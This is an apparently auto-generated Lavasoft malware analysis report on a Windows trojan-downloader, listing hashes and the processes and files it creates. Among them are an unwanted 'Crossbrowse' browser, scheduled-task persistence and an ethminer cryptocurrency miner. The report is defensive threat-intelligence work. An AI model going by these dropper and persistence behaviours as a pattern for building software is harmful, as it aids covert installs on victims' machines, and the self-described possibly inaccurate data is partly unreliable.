Trojan-Downloader.Win32.Genome.syla (Kaspersky), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 0092c9655f14abb39377f27c1a0aa364
SHA1: 92ffce48fe8c1a96fbf37b29b2d7a500ce1fd4b6
SHA256: 125a63a85bf12ecba2e2faaa14681212ea81efa5fde64ad47a427aa5b23f7358
SSDeep: 3072: QIURTXJk451jrZpHA nmwILScXY0 VFEQWk9vSPL GPfn45Yzwg3NxvCY9qXSUq: sGOnZRK0VSQNvjGHn45WNwQvrF
Size: 230691 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:46
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
nsy19.tmp:1136
9035.exe:796
nsq1C.tmp:976
nsq1C.tmp:1312
nsz2A.tmp:784
nss23.tmp:516
nsf7.tmp:644
nst13.tmp:444
setup.exe:700
%original file name%.exe:468
nsmB.tmp:640
amisid.exe:444
The Trojan injects its code into the following process(es):No processes have been created.
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process nsy19.tmp:1136 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1C.tmp (8472 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1D.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Bundle_OperaRUnew[1].exe (8472 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl1B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1D.tmp\inetc.dll (0 bytes)
The process 9035.exe:796 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\netflix.ico (1909 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\google_plus.ico (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\hotels.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\huffingtonpost.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\yahoo_finance.ico (2993 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\bing.ico (42 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\skype.ico (44 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\mail_live_msn.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\ikea.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\yelp.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\setup.exe (37305 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\wikipedia.ico (55 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\mail.ru.ico (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\tumblr.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\amazon.ico (2993 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\etsy.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\twitter.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\gmail.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\imdb.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\yandex.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\bbc.ico (1588 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\imdb.ico (601 bytes)
%WinDir%\Tasks\157013C7-5C5C-4F90-A397-9AD3412C92F0.job (1464 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\yahoo_search.ico (5593 bytes)
%WinDir%\Tasks\Crossbrowse.job (1982 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\search.ico (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\google_news.ico (2993 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\nba.ico (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\nba.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\facebook.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\cnn.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\ted.ico (1913 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\pinterest.ico (39 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\cnn.ico (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\forbes.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yelp.ico (42 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\hotels.com.ico (47 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\nfl.ico (56 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\amazon.ico (601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\youtube.ico (601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\espn.ico (36 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\google_news.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\expedia.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\skype.ico (1597 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\mail_live_msn.ico (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\bing.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\youtube.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\etsy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\nfl.ico (1913 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\utility.exe (14022 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\theguardian.ico (42 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\expedia.ico (61 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yahoo.ico (39 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\groupom.ico (601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\netflix.ico (51 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\twitter.ico (36 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\tripadvisor.ico (58 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\kayak.com.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\groupom.ico (2993 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\agoda.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\espn.ico (1588 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\bbc.ico (35 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\msn.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\nytimes.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\msn.ico (1588 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\ted.ico (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\weather_channel.ico (5593 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yandex.ico (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\ebay.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (306422 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\reddit.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\google_plus.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ie.zip[1].002 (3959285 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\gmail.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ie.zip[1].001 (3959285 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ie.zip[1].004 (3959285 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ie.zip[1].005 (3959285 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\facebook.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\booking.com.ico (1601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\chrome.dat (24 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\9gag.ico (56 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\target.ico (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\linkedin.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yahoo_finance.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\yahoo_mail.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\pinterest.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\chrome.packed.7z (1266739 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\priceline.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\mail.ru.ico (1909 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\gizmodo.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\agoda.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\bestbuy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\walmart.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\157013C7-5C5C-4F90-A397-9AD3412C92F0\157013C7-5C5C-4F90-A397-9AD3412C92F0.exe (14022 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\prefs (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\kayak.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\gizmodo.ico (2993 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\walmart.ico (48 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\icon.json (9 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\google_translate.ico (38 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\reddit.ico (60 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yahoo_search.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\tripadvisor.ico (1917 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\ebay.ico (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\google_translate.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\priceline.ico (53 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\weather_channel.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\theguardian.ico (1597 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\linkedin.ico (37 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\bestbuy.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ie.zip[1].003 (3959285 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yahoo_mail.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\search.ico (1917 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\forbes.ico (40 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\huffingtonpost.ico (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\yahoo.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\tumblr.ico (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\9gag.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\icon.json (21 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\nytimes.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\ikea.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\wikipedia.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\target.ico (1909 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\booking.com.ico (45 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (0 bytes)
%WinDir%\Tasks\157013C7-5C5C-4F90-A397-9AD3412C92F0.job (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\157013C7-5C5C-4F90-A397-9AD3412C92F0\157013C7-5C5C-4F90-A397-9AD3412C92F0.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\157013C7-5C5C-4F90-A397-9AD3412C92F0 (0 bytes)
The process nsq1C.tmp:976 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1F.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1F.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1F.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1F.tmp\amisid.exe (909 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1F.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb1E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1F.tmp\amisid.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1F.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1F.tmp\registry.dll (0 bytes)
The process nsq1C.tmp:1312 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\amisid.exe (909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\inetc.dll (22 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\registry.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh21.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\amisid.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\dummy.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\post_reply.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\inetc.dll (0 bytes)
The process nsz2A.tmp:784 makes changes in the file system.
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsa2C.tmp (0 bytes)
The process nss23.tmp:516 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsj26.tmp (28995 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\nsExec.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\cpuminer\ethminer\LICENSE.txt (1552 bytes)
%Documents and Settings%\%current user%\Application Data\cpuminer\ethminer\ethm.exe (27704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Application Data\cpuminer\ethminer\clinfo.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\CPUFeatures.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Application Data\cpuminer\ethminer\start.cmd (303 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\nsProcess.dll (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\ns28.tmp (9 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp (0 bytes)
%Documents and Settings%\%current user%\Application Data\cpuminer\ethminer\LICENSE.txt (0 bytes)
%Documents and Settings%\%current user%\Application Data\cpuminer\ethminer\ethm.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Application Data\cpuminer\ethminer\clinfo.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj25.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\CPUFeatures.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\registry.dll (0 bytes)
%Documents and Settings%\%current user%\Application Data\cpuminer\ethminer\start.cmd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\nsProcess.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\ns28.tmp (0 bytes)
%Documents and Settings%\%current user%\Application Data\cpuminer\ethminer (0 bytes)
The process nsf7.tmp:644 makes changes in the file system.
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp (0 bytes)
The process nst13.tmp:444 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\9035.exe (14022 bytes)
The process setup.exe:700 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\libexif.dll (303 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\zh-TW.pak (191 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\el.pak (1668 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\libglesv2.dll (5442 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\bn.pak (1732 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\setup.exe (6841 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\VisualElements\smalllogo.png (9 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ja.pak (266 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ko.pak (229 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\delegate_execute.exe (12288 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\hu.pak (236 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\nacl_irt_x86_32.nexe (15801 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\he.pak (254 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Crossbrowse\Crossbrowse.lnk (1 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\hi.pak (1713 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\ffmpegsumo.dll (6337 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\pl.pak (221 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\da.pak (206 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\id.pak (203 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\nacl_irt_x86_64.nexe (20507 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\th.pak (1702 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\uk.pak (1622 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\sr.pak (1611 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\chrome_200_percent.pak (7972 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\hr.pak (214 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\et.pak (202 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\chrome_child.dll (261193 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\gu.pak (1705 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Crossbrowse.lnk (1 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\mr.pak (1709 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\sv.pak (208 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe (5873 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\es.pak (231 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\zh-CN.pak (188 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ms.pak (207 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\fil.pak (228 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\fa.pak (308 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\resources.pak (117997 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\it.pak (221 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\fr.pak (240 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\sl.pak (212 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\kn.pak (1769 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ro.pak (229 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\39.6.2171.95.manifest (222 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\chrome.7z (1150215 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ar.pak (294 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\nb.pak (207 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Extensions\external_extensions.json (99 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\nacl64.exe (12288 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\fi.pak (213 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\en-GB.pak (190 bytes)
%Documents and Settings%\All Users\Desktop\Crossbrowse.lnk (1 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\te.pak (1762 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\VisualElements\splash-620x300.png (11 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\lt.pak (222 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\PepperFlash\pepflashplayer.dll (110258 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\crossbrowse.exe (3869 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ca.pak (227 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\VisualElements\logo.png (5 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ml.pak (1827 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ru.pak (1613 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\nl.pak (217 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\bg.pak (1641 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\pt-BR.pak (218 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\PepperFlash\manifest.json (2 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\wow_helper.exe (67 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\cs.pak (223 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\vi.pak (248 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\icudtl.dat (76792 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\chrome_elf.dll (125 bytes)
